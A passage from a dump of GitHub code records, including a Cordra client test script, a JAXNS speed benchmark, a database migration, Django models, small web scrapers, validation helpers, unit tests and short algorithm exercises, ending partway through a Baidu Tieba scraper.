This includes:\n* Authorization using user / password\n* Authorization using a secret key\n* Provide a token for subsequent authorization\n* Delete a token\n* Create a cordra object\n* Setting the ACL on a cordra object on create\n* Updating a cordra object\n* Updating a cordra object attribute\n* Updating a cordra object payload\n* Updating the ACL of a cordra object\n* Deleting a cordra object\n* Deleting a cordra object attribute\n* Deleting a cordra object payload\n* Querying cordra\n\nThe CordraClient also provides the additional features:\n* Reading all schemas from a remote Cordra instance and turning them into python classes\n\"\"\"\n\n\nfrom cordra import CordraClient, CordraObject\nfrom io import BytesIO\nfrom PIL import Image\nimport json\nimport requests\nimport copy\n\n\n\n# Deepcopy inputs to force a local scope\ndef deepcopy(func):\n def wrap(*args, **kwargs):\n args = list(args)\n for i, arg in enumerate(args):\n args[i] = copy.deepcopy(arg)\n for k, v in enumerate(kwargs):\n kwargs[k] = copy.deepcopy(v)\n return func(*args, **kwargs)\n return wrap\n\n\n# Connect to the test repository\nrepository = CordraClient(host=\"https://localhost:8443/\", credentials_file=\"secretlogin.json\", verify=False)\n\n# Define the document object without a remote repository\ndocument = CordraObject(_type=\"Document\", awesome=\"superb\")\n\n# Define a document object with JSON and Image payloads\ndocument_payloads = CordraObject(_type=\"Document\")\nJ = {\"a\": \"a\", \"b\":\"b\"}\ndocument_payloads.add(\"document.json\", json.dumps(J).encode()) # Add a json payload as bytes\n\nstream = BytesIO()\nA = Image.radial_gradient(\"L\").resize((11,11))\nA.save(stream, format=\"PNG\") # Write a png image to bytes object\ndocument_payloads.add(\"radial.png\", stream.getvalue()) # Add the png (in bytes) as payload\n\n\n\n\n# Test 1 - Check that a python CordraObject can be created and updated locally and correctly \n# write to Cordra\n@deepcopy\ndef Test1(document):\n document.hello = \"world\" # Update the python instance\n\n print(document)\n print(document._type)\n\n r = repository.create(document) # Write to Cordra\n print(json.dumps(r, indent=2))\n document.id = str( r[\"id\"] ) # Update the id from None to the id assigned by Cordra\n\n document_remote = repository.read( document.id ) # Read the cordra object and compare to local\n\n assert document.dict() == document_remote.dict(), \\\n \"Remote and local objects are note the same.\" # Check equivalence of objects' dicts\n\n return document\n\n\n\n\n# Test 2 - Check that local and remote payloads are equal\n@deepcopy\ndef Test2(document):\n r = repository.create(document) # Create cordra object with payloads\n document.id = str( r[\"id\"] ) # Update the id from None to the id assigned by Cordra\n\n document_remote = repository.read( document.id, getAll=True ) # Read the Object and Payloads\n\n K = json.loads( document_remote.get(\"document.json\").decode('utf-8') ) # Decode payload bytes\n assert J==K, \"JSON payload was corrupted.\"\n\n B = document_remote.get(\"radial.png\")\n assert stream.getvalue()==B, \"Image bytes were corrupted.\"\n\n return document\n\n\n\n\n# Test 3 - Check that an update can be successfully written to an object that already exists\n# in Cordra.\n@deepcopy\ndef Test3(document):\n r = repository.create(document)\n document.id = str( r[\"id\"] )\n\n # Update everything but payloads (faster updates)\n document.awesome = \"wonderful\" # Update the existing attributes of object\n document.updateditem = \"SendUpdate\" # 
Update new attributes of object\n repository.update(document, updatePayloads=False)\n\n document_remote = repository.read( document.id ) # Check that the updated objects are the same\n assert document.dict() == document_remote.dict(), \\\n \"Updated object attributes differ after synced update.\"\n\n\n # Update everything\n L = {\"c\": \"c\", \"d\":\"d\"}\n document.add(\"document.json\", json.dumps(L).encode()) # Update the JSON payload\n repository.update(document)\n\n document_remote = repository.read( document.id, getAll=True )\n K = json.loads( document_remote.get(\"document.json\").decode('utf-8') )\n assert L==K, \"JSON payloads differ after synced update.\"\n\n return document\n\n\n\n\n# Test 4 - Deletion of payloads and properties\n@deepcopy\ndef Test4(document):\n # Delete a payload\n # Verify local no longer has the payload\n # Verify local and remote are the same\n # Delete a property of object\n # Verify local no longer has the property\n # Verify local and remote are the same\n return document\n\n\n\n\n# Test 5 - Update ACLs\n@deepcopy\ndef Test5():\n ## create user\n guest = CordraObject(type=\"User\", username=\"guest\", password=\"guestpassword...1\", \n requirePasswordChange=False)\n r = repository.create(guest)\n guest.id = r[\"id\"]\n\n ## create object with ACL that includes created user\n ## create an engine with the new user credentials\n ## check that object can be edited by the new user\n return document\n\n\n\n\n# Test 6 - Delete an object\n@deepcopy\ndef Test6(document):\n # Delete the object\n repository.delete(document)\n # Verify the object does not exist\n try:\n repository.read(document.id)\n assert False, \"Object was NOT deleted\"\n except requests.exceptions.HTTPError:\n pass\n\n\n\n\n\nif __name__ == \"__main__\":\n documents_returned = [\n Test1(document),\n Test2(document_payloads),\n Test3(document_payloads),\n Test4(document_payloads),\n Test5(document)\n ]\n\n for i, d in enumerate( documents_returned ):\n if d.id is not None: Test6(d)\n","repo_name":"SvenPVoigt/CordraPy-RDF","sub_path":"tests/CRUD_CordraClient.py","file_name":"CRUD_CordraClient.py","file_ext":"py","file_size_in_byte":5746,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"41"} +{"seq_id":"23426745679","text":"import argparse\ntry:\n from jaxns.nested_sampling import NestedSampler\n from jaxns.prior_transforms import PriorChain, UniformPrior, NormalPrior\nexcept:\n raise ImportError(\"Install JaxNS with GPU support!\")\nfrom timeit import default_timer\nimport numpy as np\nimport pylab as plt\nfrom functools import partial\nfrom jax import random, jit, numpy as jnp, devices as jax_devices\nimport jax.scipy.linalg as jax_linalg\nfrom jax.config import config\n\nconfig.update(\"jax_enable_x64\", True)\n\nTEST_NDIMS = [10,20,30,40,50,60,70,80,90,100]\n\ndef jax_log_normal(x, mean, cov):\n L = jnp.linalg.cholesky(cov)\n dx = x - mean\n dx = jax_linalg.solve_triangular(L, dx, lower=True)\n return -0.5 * x.size * jnp.log(2. 
* jnp.pi) - jnp.sum(jnp.log(jnp.diag(L))) \\\n - 0.5 * dx @ dx\n\n\ndef main(use_gpu):\n devices = jax_devices()\n if use_gpu:\n gpu_dev = None\n for dev in devices:\n if dev.platform == 'gpu':\n gpu_dev = dev\n break\n if gpu_dev is None:\n raise ValueError(f\"No valid GPU device among {devices}\")\n else:\n cpu_dev = None\n for dev in devices:\n if dev.platform == 'cpu':\n cpu_dev = dev\n break\n if cpu_dev is None:\n raise ValueError(f\"No valid CPU device among {devices}\")\n def run_with_n(ndims, num_live_points):\n prior_mu = 2 * jnp.ones(ndims)\n prior_cov = jnp.diag(jnp.ones(ndims)) ** 2\n\n data_mu = jnp.zeros(ndims)\n data_cov = jnp.diag(jnp.ones(ndims)) ** 2\n data_cov = jnp.where(data_cov == 0., 0.95, data_cov)\n\n jax_log_likelihood = lambda theta, **kwargs: jax_log_normal(theta, data_mu, data_cov)\n\n prior_transform = PriorChain().push(NormalPrior('theta', prior_mu, jnp.sqrt(jnp.diag(prior_cov))))\n ns = NestedSampler(jax_log_likelihood, prior_transform, sampler_name='slice')\n\n @partial(jit, backend='gpu' if use_gpu else 'cpu')\n def run(key):\n return ns(key=key,\n num_live_points=num_live_points,\n max_samples=1e7,\n collect_samples=False,\n termination_frac=0.001,\n sampler_kwargs=dict(depth=3, num_slices=5))\n\n # first run to make it compile\n results = run(random.PRNGKey(2345256))\n results.logZ.block_until_ready()\n # now measure time\n t0 = default_timer()\n results = run(random.PRNGKey(3498576))\n results.logZ.block_until_ready()\n run_time = (default_timer() - t0)\n\n print(f\"JAXNS num_live_points={num_live_points} ndims={ndims} run time: {run_time}\")\n if results.num_samples >= 1e7:\n raise ValueError(\"Reached maximum number of samples {}.\".format(results.num_samples))\n return run_time\n\n save_file = 'speed_test_results_{}.npz'.format('GPU' if use_gpu else 'CPU')\n run_times = [run_with_n(ndims, ndims*50) for ndims in TEST_NDIMS]\n np.savez(save_file,\n test_ndims = np.array(TEST_NDIMS),\n run_times=np.array(run_times))\n\n run_times = np.load(save_file)['run_times']\n test_ndims = np.load(save_file)['test_ndims']\n\n plt.plot(test_ndims, run_times, label='GPU' if use_gpu else 'CPU')\n plt.legend()\n plt.show()\n\n\n\n\ndef add_args(parser):\n parser.register(\"type\", \"bool\", lambda v: v.lower() == \"true\")\n parser.add_argument('--use_gpu', help='Whether to use GPU or else CPU',\n default=False, type=\"bool\", required=False)\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(\n description='Runs a speed test on CPU or GPU.',\n formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n add_args(parser)\n flags, unparsed = parser.parse_known_args()\n print(\"Running with:\")\n for option, value in vars(flags).items():\n print(\" {} -> {}\".format(option, value))\n\n main(**vars(flags))","repo_name":"Joshuaalbert/jaxns_paper","sub_path":"speed_test/speed_test.py","file_name":"speed_test.py","file_ext":"py","file_size_in_byte":3954,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"41"} +{"seq_id":"4918023139","text":"\"\"\"model_characteristics_added\n\nRevision ID: 4db2c98dc94d\nRevises: 5daf25e84504\nCreate Date: 2020-07-30 15:04:49.242069\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\nfrom sqlalchemy.dialects import postgresql\n\n# revision identifiers, used by Alembic.\nrevision = '4db2c98dc94d'\ndown_revision = '5daf25e84504'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! 
###\n op.add_column('Model', sa.Column('Characteristics', postgresql.ARRAY(sa.String()), nullable=True))\n op.add_column('Model', sa.Column('Characteristics RU', postgresql.ARRAY(sa.String()), nullable=True))\n op.add_column('Model', sa.Column('Characteristics UK', postgresql.ARRAY(sa.String()), nullable=True))\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_column('Model', 'Characteristics UK')\n op.drop_column('Model', 'Characteristics RU')\n op.drop_column('Model', 'Characteristics')\n # ### end Alembic commands ###\n","repo_name":"ldvy/mediPrime-website","sub_path":"migrations/versions/4db2c98dc94d_model_characteristics_added.py","file_name":"4db2c98dc94d_model_characteristics_added.py","file_ext":"py","file_size_in_byte":1053,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"41"} +{"seq_id":"27692049940","text":"import os\nimport uuid\n\nfrom django.db import models\nfrom django.db.models import Q\nfrom django.db.models.signals import pre_save, post_delete\nfrom django.dispatch import receiver\n\nfrom users.models import User\nfrom main import utils\nfrom main.utils import EmbedHTML\n\nfrom markdownx.models import MarkdownxField\n\n\nclass TimeStampedModel(models.Model):\n created_at = models.DateTimeField(auto_now_add=True)\n modified_at = models.DateTimeField(auto_now=True)\n\n class Meta:\n abstract = True\n\n\nclass Content(TimeStampedModel):\n\n # 画像ファイルの保存場所\n def get_image_path(self, filename):\n name = str(uuid.uuid4())\n extension = os.path.splitext(filename)[-1]\n return 'images/' + name + extension\n\n # 製作者\n creator = models.ForeignKey(\n User, on_delete=models.CASCADE, related_name=\"contents\")\n # タイトル\n title = models.CharField('作品タイトル', max_length=64)\n # 説明\n description = MarkdownxField('説明文', blank=True, null=True)\n # コンテンツのタイプ\n content_type = models.CharField(\n 'コンテンツの種類',\n choices=utils.CONTENT_TYPES, default=utils.SCRATCH, max_length=32)\n # 一覧で表示される画像\n thumbnail = models.ImageField('トップ画像', upload_to=get_image_path)\n # プロジェクトの各種サイトURL\n url = models.URLField('作品の掲載元のURL', blank=True, null=True, default=\"\")\n # 埋め込み用HTML: receiverによる自動入力\n embed_html = models.TextField(blank=True, null=False)\n\n def __str__(self):\n return f'{self.content_type}: {self.title}'\n\n @property\n def is_embed_type(self):\n \"\"\"コンテンツ埋め込みタイプであるかどうか\"\"\"\n return self.content_type in utils.EMBED_TYPES\n\n def is_created_by(self, user):\n \"\"\"コンテンツ投稿者であるかどうか\"\"\"\n return self.creator == user\n\n # 訪問履歴取得関数群\n def get_visits_other_than_creator(self):\n \"\"\"コンテンツ投稿者以外の訪問履歴を取得\"\"\"\n return self.visits.filter(~Q(visitor=self.creator))\n\n def get_visits_only_logged_in_user(self):\n \"\"\"ログインユーザーのみの訪問履歴を取得\"\"\"\n return self.visits.filter(~Q(visitor=None))\n\n\nclass ContentVisit(TimeStampedModel):\n \"\"\"作品への訪問\"\"\"\n # 訪問された作品\n content = models.ForeignKey(\n Content, on_delete=models.CASCADE, related_name=\"visits\")\n # 訪問したユーザー(ログインしていなければAnonymousUser)\n visitor = models.ForeignKey(\n User, on_delete=models.CASCADE, related_name=\"visits\",\n blank=True, null=True, default=None)\n # 接続元IPアドレス\n remote_addr = models.GenericIPAddressField('接続元IPアドレス')\n # 接続元UserAgent\n user_agent = models.TextField('接続元UserAgent')\n # リクエストHTTPメソッド\n request_method = models.CharField('HTTPメソッド', max_length=10)\n\n def __str__(self):\n title = self.content.title\n visitor = self.visitor\n if visitor:\n visitor_name = visitor.username\n else:\n visitor_name = 
\"AnonymousUser\"\n date = self.created_at.strftime(r\"%Y/%m/%d %H:%M:%S\")\n return f'[{date}] \"{title}\" - {visitor_name}'\n\n\n# class Favorite(TimeStampedModel):\n# content = models.OneToOneField(\n# Content, related_name=\"likes\", on_delete=models.CASCADE)\n# users = models.ManyToManyField(User, related_name='likes')\n\n# def __str__(self):\n# return f'{self.content.title}'\n\n\n@receiver(pre_save, sender=Content)\ndef validate_url_and_auto_fill_embed_html_pre_save(\n sender, instance: Content, *args, **kwargs):\n \"\"\"URLのvalidation後、コンテンツ保存前にURLに合わせて埋め込み用のHTMLを生成して入力する\"\"\"\n if instance.url:\n # URLのクリーニング\n content_type = instance.content_type\n url = utils.clean_content_url(instance.url, content_type)\n instance.url = url\n # URLのバリデーション\n content_url_validator = utils.ContentURLValidator()\n content_url_validator(url, content_type)\n # safetyなURLから埋め込み用のHTMLを取得\n if content_type in utils.EMBED_TYPES:\n get_embed_html = EmbedHTML(content_type, url)\n instance.embed_html = get_embed_html()\n\n\n@receiver(post_delete, sender=Content)\ndef auto_remove_image_file_post_delete(sender, instance, *args, **kwargs):\n \"\"\"コンテンツ削除時に画像削除\"\"\"\n if instance.thumbnail:\n if os.path.isfile(instance.thumbnail.path):\n os.remove(instance.thumbnail.path)\n\n\n@receiver(pre_save, sender=Content)\ndef auto_remove_image_on_change(sender, instance, **kwargs):\n \"\"\"画像変更時に元画像削除\"\"\"\n if not instance.pk:\n return False\n\n try:\n old_file = Content.objects.get(pk=instance.pk).thumbnail\n except Content.DoesNotExist:\n return False\n\n if not bool(old_file):\n return False\n\n new_file = instance.thumbnail\n if not old_file == new_file:\n if os.path.isfile(old_file.path):\n os.remove(old_file.path)\n","repo_name":"USHIken/web-idea-box","sub_path":"code/main/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":5277,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"41"} +{"seq_id":"1611967225","text":"import time\n\nfrom selenium.webdriver import Chrome\nfrom selenium.webdriver.chrome.options import Options\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.select import Select\n\n# Config headless browser\nopt = Options()\nopt.add_argument(\"--headless\")\nopt.add_argument(\"--disable-gpu\")\n\nweb = Chrome(options=opt) # Config the headless to the chrome.\n\nurl = 'https://www.endata.com.cn/BoxOffice/BO/Year/index.html'\n\nweb.get(url)\n\n# GET select elements;\nsel_element = web.find_element(By.XPATH, '//*[@id=\"OptionDate\"]') # GET element\n\n# Packed the element to become selectable.\nsel = Select(sel_element)\n\n# Let the browser switch option\n\nfor i in range(len(sel.options)):\n sel.select_by_index(i)\n time.sleep(3)\n table = web.find_element(By.XPATH, '//*[@id=\"TableList\"]/table')\n print(table.text)\n print(\"**********************************************************\")\n\nweb.close()\n","repo_name":"etn13/pythonlearning","sub_path":"p04_selenium/s03_withoutheader.py","file_name":"s03_withoutheader.py","file_ext":"py","file_size_in_byte":917,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"41"} +{"seq_id":"10489072132","text":"def validar_positivo(inf, mensaje, ban=True):\n n = inf\n while n <= inf:\n if ban:\n n = int(input(mensaje))\n else:\n n = float(input(mensaje))\n if n <= inf:\n print(f\"\\nError ! 
ingrese un valor superior a [{inf}].\")\n\n return n\n\n\ndef validar_rango(inf, sup, mensaje, ban=True):\n n = inf-1\n while n < inf or n > sup:\n if ban:\n n = int(input(mensaje))\n else:\n n = float(input(mensaje))\n if n < inf or n > sup:\n print(f\"\\nError ! ingrese un valor entre [{inf}-{sup}].\")\n return n\n\n\ndef validar_codigo(tam, mensaje):\n cad = \"\"\n while tam == len(cad):\n cad = input(mensaje)\n if tam == len(cad):\n print(\"\\nError ! la cadena no puede estar vacia.\")\n\n return cad\n","repo_name":"juanjoowendler/de_todo_con_python","sub_path":"practicas/practicas_final_materia/practica_ejercicios_final/practica_final_2/modulo_funciones.py","file_name":"modulo_funciones.py","file_ext":"py","file_size_in_byte":810,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"41"} +{"seq_id":"4726562304","text":"import unittest\nimport dgsl_engine.game_factory as factory\n\n\n# Tests ################################################################\n\nclass TestGameFactory(unittest.TestCase):\n def setUp(self):\n fact = factory.GameFactory()\n self.game = fact.new('tests/worlds/testing_ground')\n\n def test_new(self):\n # Not really an adequate tests, but it runs the code.\n self.assertEqual(self.game.world.details.name, 'testing ground')\n self.assertEqual(self.game.world.details.version, '0.0')\n self.assertEqual(self.game.world.details.welcome, 'fun is waiting!')\n\n def test_name_to_path(self):\n name = 'some fun world'\n path = 'some_fun_world.world'\n self.assertEqual(factory.name_to_path(name), path)\n\n# Main #################################################################\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"strinsberg/dgsl-text-adventure-engine","sub_path":"tests/test_game_factory.py","file_name":"test_game_factory.py","file_ext":"py","file_size_in_byte":883,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"41"} +{"seq_id":"9814982526","text":"import json\n\nclass LocalDatabase:\n def __init__(self):\n print(\"Database is local\")\n with open('../mock/localDatabase.json', 'r') as file:\n content = json.load(file)\n self.musicScoreList = content['musicScores']\n self.composersList = content['composers']\n self.composerInc = len(self.composersList)\n\n def getAllMusicScores(self, column=''):\n return self.musicScoreList\n\n def insertMusicScore(self, musicScore):\n jsonMusicScore = {}\n jsonMusicScore['title'] = musicScore['title']\n jsonMusicScore['commonname'] = self.composersList[int(musicScore['composer'])]['commonname']\n jsonMusicScore['type'] = musicScore['type']\n jsonMusicScore['dateofcreation'] = musicScore['dateofcreation']\n jsonMusicScore['difficulty'] = musicScore['difficulty']\n jsonMusicScore['appreciation'] = musicScore['appreciation']\n jsonMusicScore['comments'] = musicScore['comments']\n self.musicScoreList.append(jsonMusicScore)\n\n def getAllComposers(self, column='*'):\n return self.composersList\n\n def insertComposer(self, composer):\n jsonComposer = {}\n jsonComposer['commonname'] = composer['name']\n jsonComposer['fullname'] = composer['fullname']\n jsonComposer['dateofbirth'] = composer['dateofbirth']\n jsonComposer['dateofdeath'] = composer['dateofdeath']\n jsonComposer['nationality'] = composer['nationality']\n jsonComposer['style'] = composer['style']\n jsonComposer['composer_id'] = self.composerInc\n self.composerInc += 1\n self.composersList.append(jsonComposer)\n\nif __name__ == \"__main__\":\n db = LocalDatabase()\n 
print(db.getAllMusicScore())\n print(db.getAllComposers())","repo_name":"tuxnut/music_db","sub_path":"app/LocalDatabase.py","file_name":"LocalDatabase.py","file_ext":"py","file_size_in_byte":1763,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"41"} +{"seq_id":"76469492","text":"#!/usr/bin/env python\n\"\"\"\nScript to update links to project version nodes\n\n\"\"\"\nimport logging\nimport sys\n\nfrom LbUtils.Script import Script\nfrom LbRelease.SoftConfDB.SoftConfDB import SoftConfDB\n\n\nclass LbSdbUpdateVersion(Script):\n \"\"\" Update information about a project / version \"\"\"\n\n def defineOpts(self):\n \"\"\" Script specific options \"\"\"\n parser = self.parser\n parser.add_option(\"-d\",\n dest = \"debug\",\n action = \"store_true\",\n help = \"Display debug output\")\n\n parser.add_option(\"-s\",\n dest = \"action\",\n action = \"store\",\n default = \"a\",\n help = \"Set the action to be done: a: clear active flags, u: clear used flags\")\n\n\n def main(self):\n \"\"\" Main method for bootstrap and parsing the options.\n It invokes the appropriate method and \"\"\"\n self.log = logging.getLogger()\n opts = self.options\n args = self.args\n if opts.debug:\n self.log.setLevel(logging.DEBUG)\n else:\n self.log.setLevel(logging.WARNING)\n if len(args) < 2 :\n self.log.error(\"Not enough arguments\")\n sys.exit(1)\n else :\n project = args[0].upper()\n version = args[1]\n\n # Connect to the ConfDB to update the platform\n self.mConfDB = SoftConfDB()\n if self.options.action.lower() == \"a\":\n self.mConfDB.setPVActive(project, version)\n elif self.options.action.lower() == \"u\":\n self.mConfDB.setPVUsed(project, version)\n else:\n self.log.error(\"Unknown action %s \" % self.options.action)\n\nif __name__=='__main__':\n sUsage = \"\"\"%prog project version \"\"\"\n s = LbSdbUpdateVersion(usage=sUsage)\n sys.exit(s.run())\n\n\n","repo_name":"stonish/lhcb-software","sub_path":"LbScripts/LbRelease/python/LbRelease/SoftConfDB/LbSdbUpdateVersion.py","file_name":"LbSdbUpdateVersion.py","file_ext":"py","file_size_in_byte":1925,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"41"} +{"seq_id":"71757959805","text":"import pandas as pd\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.metrics import accuracy_score\nfrom data.student_demographics import demographics\n\n\n\ndef predict_gpa(demographics):\n\n # Load the student data into a pandas dataframe\n demographics_df = pd.DataFrame(demographics)\n\n\n # Split the data into training and testing sets\n X = demographics_df.drop('GPA', axis=1)\n y = demographics_df['GPA']\n X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=42)\n\n # Create a decision tree classifier\n clf = DecisionTreeClassifier()\n\n # Fit the classifier to the training data\n clf.fit(X_train, y_train)\n\n # Make predictions on the testing data\n y_pred = clf.predict(X_test)\n\n # Evaluate the accuracy of the model\n accuracy = accuracy_score(y_test, y_pred)\n print('Accuracy:', accuracy)\n # Return the predicted GPA\n return y_pred.tolist()\n\npredict_gpa(demographics)","repo_name":"KellyPared/Learning_Dashboard","sub_path":"machine_learning_gpa.py","file_name":"machine_learning_gpa.py","file_ext":"py","file_size_in_byte":1009,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"41"} +{"seq_id":"15371325298","text":"#!/bin/python3\n\nimport math\nimport 
os\nimport random\nimport re\nimport sys\n\n#\n# Complete the 'getTotalX' function below.\n#\n# The function is expected to return an INTEGER.\n# The function accepts following parameters:\n# 1. INTEGER_ARRAY a\n# 2. INTEGER_ARRAY b\n#\n\ndef getTotalX(a, b):\n \"\"\"\n Brute force, basic math / number theory too hard T_T\n \"\"\"\n a,b = list(set(a)), list(set(b))\n reduced_a, reduced_b = [], []\n a.sort()\n b.sort()\n for i in range(len(a)):\n add = True\n for j in range(i+1,len(a)):\n if j < len(a) and a[j] % a[i] == 0:\n add = False\n break\n if add:\n reduced_a.append(a[i])\n\n blacklist = set()\n for i in range(len(b)):\n if b[i] in blacklist:\n continue\n for j in range(i+1,len(b)):\n if j < len(b) and b[j] % b[i] == 0:\n blacklist.add(b[j])\n reduced_b.append(b[i])\n\n cur_val, stop = max(reduced_a), min(reduced_b)\n step = cur_val\n\n output = 0\n print(reduced_a)\n print(reduced_b)\n\n while cur_val <= stop:\n go_next = False\n for i in reduced_a:\n if cur_val % i != 0:\n go_next = True\n break\n if go_next:\n cur_val += step\n continue\n\n for i in reduced_b:\n if i % cur_val != 0:\n go_next = True\n break\n if go_next:\n cur_val += step\n continue\n\n output += 1\n cur_val += step\n\n return output\n\nif __name__ == '__main__':\n fptr = open(os.environ['OUTPUT_PATH'], 'w')\n\n first_multiple_input = input().rstrip().split()\n\n n = int(first_multiple_input[0])\n\n m = int(first_multiple_input[1])\n\n arr = list(map(int, input().rstrip().split()))\n\n brr = list(map(int, input().rstrip().split()))\n\n total = getTotalX(arr, brr)\n\n fptr.write(str(total) + '\\n')\n\n fptr.close()\n\n","repo_name":"fyangss/questions","sub_path":"python/hr/algorithms/between_two_sets_easy.py","file_name":"between_two_sets_easy.py","file_ext":"py","file_size_in_byte":1744,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"41"} +{"seq_id":"17343743678","text":"from typing import TYPE_CHECKING, Any, Dict, List\n\nfrom aiopoke.objects.utility import Name, NamedResource\nfrom aiopoke.utils.minimal_resources import MinimalResource\n\nif TYPE_CHECKING:\n from aiopoke.objects.resources import VersionGroup\n\n\nclass Version(NamedResource):\n version_group: MinimalResource[\"VersionGroup\"]\n names: List[\"Name\"]\n\n def __init__(\n self,\n *,\n id: int,\n name: str,\n version_group: Dict[str, Any],\n names: List[Dict[str, Any]]\n ) -> None:\n super().__init__(id=id, name=name)\n self.version_group = MinimalResource(**version_group)\n self.names = [Name(**name) for name in names]\n","repo_name":"beastmatser/aiopokeapi","sub_path":"src/aiopoke/objects/resources/games/version.py","file_name":"version.py","file_ext":"py","file_size_in_byte":677,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"41"} +{"seq_id":"73435701564","text":"import unittest\nimport types\nfrom utils import *\nfrom LazyScripts.LazyMultithread import *\n\n\nclass multithreadedTest(unittest.TestCase):\n\n def test_multithread(self):\n results = multithread(multithread_test, [[1, 2, 3], [4, 5, 6]])\n self.assertTrue(results)\n results = multithread(multithread_test, [[1, 2, 3], [4, 5, 6]],\n chunksize=2, maxtasksperchild=2)\n self.assertTrue(results)\n\n def test_safe_multithread(self):\n results = safe_multithread(multithread_test, [[1, 2, 3], [4, 5, 6]])\n self.assertTrue(results)\n results = safe_multithread(multithread_test, [[1, 2, 3], [4, 5, 6]],\n chunksize=2)\n self.assertTrue(results)\n\n def test_multithread_failsafe(self):\n results = 
multithread_failsafe(multithread_test,\n [[1, 2, 3], [4, 5, 0]], verbose=True)\n print(type(results), results)\n results = list(results)\n self.assertTrue(results)\n self.assertTrue(len(results) == 1)\n results = multithread_failsafe(multithread_test,\n [[1, 2, 3], [4, 5, 0]], chunksize=2,\n verbose=False)\n results = list(results)\n self.assertTrue(results)\n self.assertTrue(len(results) == 1)\n\n def test_safe_multithread_failsafe(self):\n results = safe_multithread_failsafe(multithread_test,\n [[1, 2, 3], [4, 5, 0]],\n verbose=False)\n self.assertTrue(isinstance(results, types.GeneratorType))\n results = list(results)\n self.assertTrue(results)\n self.assertTrue(len(results) == 1)\n results = safe_multithread_failsafe(multithread_test,\n [[1, 2, 3], [4, 5, 0]],\n chunksize=2, verbose=False)\n self.assertTrue(results)\n results = list(results)\n self.assertTrue(len(results) == 1)\n\n def test_assert_yield(self):\n # self.assertTrue(False)\n results = multithread_failsafe(multithread_test,\n [[4, 5, 0], [1, 2, 3]], verbose=False)\n print(type(results), results)\n results = list(results)\n self.assertTrue(results)\n self.assertTrue(len(results) == 1)\n print(results)\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"jameswenzel/LazyScripts","sub_path":"tests/test_LazyMultithread.py","file_name":"test_LazyMultithread.py","file_ext":"py","file_size_in_byte":2505,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"41"} +{"seq_id":"37232845184","text":"n = int(input())\ndata = [int(x) for x in input().split(' ')]\n\nmax_l = data[0]\nmax_g = data[0]\n\nfor i in range(1,n):\n max_l = max(data[i],max_l + data[i])\n max_g = max(max_g,max_l)\n\nprint(max_g)","repo_name":"wesckeley/competitive-programming","sub_path":"ucoder/1039-corredor.py","file_name":"1039-corredor.py","file_ext":"py","file_size_in_byte":199,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"41"} +{"seq_id":"34732011189","text":"#Uses python3\n\n\ndef reach(adj, current):\n vertecis_visited[current] = True\n sink = True\n for vertix in adj[current]:\n if removed_vertecis[vertix]:\n pass\n elif vertecis_visited[vertix]:\n return 1\n else:\n if reach(adj, vertix) == 1:\n return 1\n if not removed_vertecis[vertix]:\n sink = False\n if sink:\n removed_vertecis[current] = True\n return 0\n\n\nif __name__ == '__main__':\n v, e = [int(x) for x in input().split()]\n vertecis_visited = [False for i in range(int(v) + 1)]\n removed_vertecis = [False for i in range(int(v) + 1)]\n conn_list = [set() for i in range(int(v) + 1)]\n for i in range(e):\n v1, v2 = [int(x) for x in input().split()]\n conn_list[v1].add(v2)\n print(reach(conn_list, 1))\n\n","repo_name":"adibl/corsera_algoritems","sub_path":"my_solutions/3-algorithms-on-graphs/2-decomposition-2/acyclicity.py","file_name":"acyclicity.py","file_ext":"py","file_size_in_byte":837,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"41"} +{"seq_id":"36620945322","text":"\"\"\"\"\n*_* coding: utf-8 *_*\nauthor:蔡梦丹\ntime:2022/9/28 9:18\nfile :下午篇1.PY\n\"\"\"\"\"\nimport requests\n# 百度贴吧案例加分页\ndef tieba(url,begin_page,end_page):\n for page in range(begin_page,end_page+1):\n pn = (page-1)*50\n file_name = \"第\" +str(page) +\"页.html\"\n full_url = url +'&pn='+str(pn)\n html = load_page(full_url,file_name)\n write_page(html,file_name)\ndef load_page(url,file_name):\n headers = {\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 
